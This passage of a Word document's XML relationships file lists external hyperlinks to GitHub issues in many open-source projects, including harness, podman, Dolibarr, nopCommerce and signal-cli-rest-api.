Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/7798" TargetMode="External"/><Relationship Id="rId590" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/14863" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/120" TargetMode="External"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/2475" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/42" TargetMode="External"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/2251" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/5" TargetMode="External"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/2193" TargetMode="External"/><Relationship Id="rId589" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/14769" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/treasure-data/digdag/issues/658" TargetMode="External"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/2154" TargetMode="External"/><Relationship Id="rId588" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/14676" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/323" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/190" TargetMode="External"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/1280" TargetMode="External"/><Relationship Id="rId583" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/14291" TargetMode="External"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/1217" TargetMode="External"/><Relationship Id="rId582" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/14208" TargetMode="External"/><Relationship Id="rId581" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/13986" TargetMode="External"/><Relationship Id="rId580" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/13831" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/treasure-data/digdag/issues/65" TargetMode="External"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/2047" TargetMode="External"/><Relationship Id="rId587" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/14674" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/treasure-data/digdag/issues/52" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/2010" TargetMode="External"/><Relationship Id="rId586" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/14647" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/treasure-data/digdag/issues/37" TargetMode="External"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/1775" TargetMode="External"/><Relationship Id="rId585" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/14498" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/corona-warn-app/cwa-verification-server/issues/55" TargetMode="External"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/1701" TargetMode="External"/><Relationship Id="rId584" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/14458" TargetMode="External"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://github.com/zenazn/goji/web.func002(0x7f65f2564928" TargetMode="External"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/1190" TargetMode="External"/><Relationship Id="rId579" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/13824" TargetMode="External"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/1184" TargetMode="External"/><Relationship Id="rId578" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/makeplane/plane/issues/2529" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/1183" TargetMode="External"/><Relationship Id="rId577" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/makeplane/plane/issues/2329" TargetMode="External"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/1198" TargetMode="External"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/993" TargetMode="External"/><Relationship Id="rId572" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/makeplane/plane/issues/1964" TargetMode="External"/><Relationship Id="rId571" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Jigsaw-Code/outline-server/issues/1499" TargetMode="External"/><Relationship Id="rId570" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Jigsaw-Code/outline-server/issues/999" TargetMode="External"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/1173" TargetMode="External"/><Relationship Id="rId576" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/makeplane/plane/issues/2322" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/1086" TargetMode="External"/><Relationship Id="rId575" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/makeplane/plane/issues/2152" TargetMode="External"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/1022" TargetMode="External"/><Relationship Id="rId574" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/makeplane/plane/issues/2139" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/1005" TargetMode="External"/><Relationship Id="rId573" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/makeplane/plane/issues/1998" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/HTTP-APIs/hydrus/issues/429" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/29115" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/27173" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/26881" TargetMode="External"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/HTTP-APIs/hydrus/issues/182" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/26307" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hummingbot/hummingbot/issues/5273" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/24661" TargetMode="External"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/3274" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/23790" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/3010" TargetMode="External"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/2977" TargetMode="External"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/2943" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/26283" TargetMode="External"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hummingbot/hummingbot/issues/5251" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/26066" TargetMode="External"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/3420" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/25929" TargetMode="External"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/3416" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/24780" TargetMode="External"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/3402" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nightscout/cgm-remote-monitor/issues/3468" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/zalando-incubator/catwatch/issues/5" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nightscout/cgm-remote-monitor/issues/6843" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nightscout/cgm-remote-monitor/issues/5347" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/corona-warn-app/cwa-verification-server/issues/33" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nightscout/cgm-remote-monitor/issues/7910" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/13429" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/13120" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/13597" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ansible/awx/issues/13439" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/23345" TargetMode="External"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/23248" TargetMode="External"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/2776" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/23179" TargetMode="External"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/2766" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/795" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/2763" TargetMode="External"/><Relationship Id="rId599" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/16360" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Dolibarr/dolibarr/issues/23415" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/327" TargetMode="External"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/2538" TargetMode="External"/><Relationship Id="rId594" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/15720" TargetMode="External"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/2525" TargetMode="External"/><Relationship Id="rId593" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/15485" TargetMode="External"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/2524" TargetMode="External"/><Relationship Id="rId592" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/15476" TargetMode="External"/><Relationship Id="rId591" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/15430" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/430" TargetMode="External"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/2710" TargetMode="External"/><Relationship Id="rId598" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/16150" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/417" TargetMode="External"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/2650" TargetMode="External"/><Relationship Id="rId597" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/15952" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/413" TargetMode="External"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/2643" TargetMode="External"/><Relationship Id="rId596" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/15828" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunscrapers/djoser/issues/374" TargetMode="External"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/2566" TargetMode="External"/><Relationship Id="rId595" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containers/podman/issues/15765" TargetMode="External"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/snarfed/granary/issues/146" TargetMode="External"/><Relationship Id="rId547" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/6723" TargetMode="External"/><Relationship Id="rId789" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/413" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/snarfed/granary/issues/135" TargetMode="External"/><Relationship Id="rId546" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/6686" TargetMode="External"/><Relationship Id="rId788" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/412" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/snarfed/granary/issues/127" TargetMode="External"/><Relationship Id="rId545" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/6610" TargetMode="External"/><Relationship Id="rId787" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/410" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/snarfed/granary/issues/101" TargetMode="External"/><Relationship Id="rId544" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/6484" TargetMode="External"/><Relationship Id="rId786" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/403" TargetMode="External"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/265" TargetMode="External"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/31" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/snarfed/granary/issues/752" TargetMode="External"/><Relationship Id="rId549" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/7101" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/snarfed/granary/issues/214" TargetMode="External"/><Relationship Id="rId548" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/6859" TargetMode="External"/><Relationship Id="rId781" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/236" TargetMode="External"/><Relationship Id="rId780" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/224" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/snarfed/granary/issues/22" TargetMode="External"/><Relationship Id="rId543" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/6458" TargetMode="External"/><Relationship Id="rId785" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/402" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/snarfed/granary/issues/18" TargetMode="External"/><Relationship Id="rId542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/6444" TargetMode="External"/><Relationship Id="rId784" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/387" TargetMode="External"/><Relationship Id="rId541" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/6403" TargetMode="External"/><Relationship Id="rId783" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/369" TargetMode="External"/><Relationship Id="rId540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/6033" TargetMode="External"/><Relationship Id="rId782" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/242" TargetMode="External"/><Relationship Id="rId536" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/5746" TargetMode="External"/><Relationship Id="rId778" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/187" TargetMode="External"/><Relationship Id="rId535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/5553" TargetMode="External"/><Relationship Id="rId777" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/177" TargetMode="External"/><Relationship Id="rId534" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/5469" TargetMode="External"/><Relationship Id="rId776" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/175" TargetMode="External"/><Relationship Id="rId533" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/5400" TargetMode="External"/><Relationship Id="rId775" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/135" TargetMode="External"/><Relationship Id="rId539" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/6007" TargetMode="External"/><Relationship Id="rId538" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/5990" TargetMode="External"/><Relationship Id="rId537" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/5907" TargetMode="External"/><Relationship Id="rId779" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/190" TargetMode="External"/><Relationship Id="rId770" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/1" TargetMode="External"/><Relationship Id="rId532" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/5384" TargetMode="External"/><Relationship Id="rId774" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/103" TargetMode="External"/><Relationship Id="rId531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/5368" TargetMode="External"/><Relationship Id="rId773" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/95" TargetMode="External"/><Relationship Id="rId530" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nopSolutions/nopCommerce/issues/5359" TargetMode="External"/><Relationship Id="rId772" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/91" TargetMode="External"/><Relationship Id="rId771" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/19" TargetMode="External"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/942" TargetMode="External"/><Relationship Id="rId569" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore/issues/16888" TargetMode="External"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/937" TargetMode="External"/><Relationship Id="rId568" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore/issues/16542" TargetMode="External"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/914" TargetMode="External"/><Relationship Id="rId567" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore/issues/16434" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/809" TargetMode="External"/><Relationship Id="rId566" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore/issues/16059" TargetMode="External"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/983" TargetMode="External"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/982" TargetMode="External"/><Relationship Id="rId561" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore/issues/9508" TargetMode="External"/><Relationship Id="rId560" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore/issues/9362" TargetMode="External"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/779" TargetMode="External"/><Relationship Id="rId565" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore/issues/15381" TargetMode="External"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/738" TargetMode="External"/><Relationship Id="rId564" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore/issues/13671" TargetMode="External"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harness/harness/issues/660" TargetMode="External"/><Relationship Id="rId563" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OrchardCMS/OrchardCore/issues/11953" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 